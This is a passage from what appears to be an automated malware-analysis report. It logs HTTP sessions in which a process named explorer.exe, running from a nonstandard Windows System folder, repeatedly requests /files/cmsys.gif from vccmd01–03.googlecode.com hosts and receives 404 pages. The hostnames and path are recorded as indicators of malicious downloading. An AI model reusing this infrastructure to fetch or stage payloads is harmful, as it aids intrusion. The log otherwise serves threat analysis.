                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:45.650468111 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    49192.168.2.560691142.251.168.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:46.041263103 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd03.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:46.961796045 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:09:46 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:46.961813927 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:47.222007990 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:47.224443913 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:09:46 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:47.224617958 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    50192.168.2.56069364.233.166.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:49.751261950 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:50.668850899 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:09:50 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:50.668972015 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    51192.168.2.560694108.177.15.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:51.031944990 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd02.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:51.966985941 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:09:51 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:51.967000961 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    52192.168.2.560695142.251.168.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:52.162714958 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd03.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:53.116728067 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:09:52 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:53.116743088 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    53192.168.2.56069764.233.166.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:55.409327984 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd01.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:56.332931995 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:09:56 GMT
                                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:56.333319902 CET495INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                                                                                                                                                                    Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    54192.168.2.560698108.177.15.82802920C:\Windows\System\explorer.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:56.554819107 CET214OUTGET /files/cmsys.gif HTTP/1.1
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                    Host: vccmd02.googlecode.com
                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                    Oct 29, 2024 13:09:57.483936071 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer
                                                                                                                                                                                                                                                    Content-Length: 1576
                                                                                                                                                                                                                                                    Date: Tue, 29 Oct 2024 12:09:57 GMT
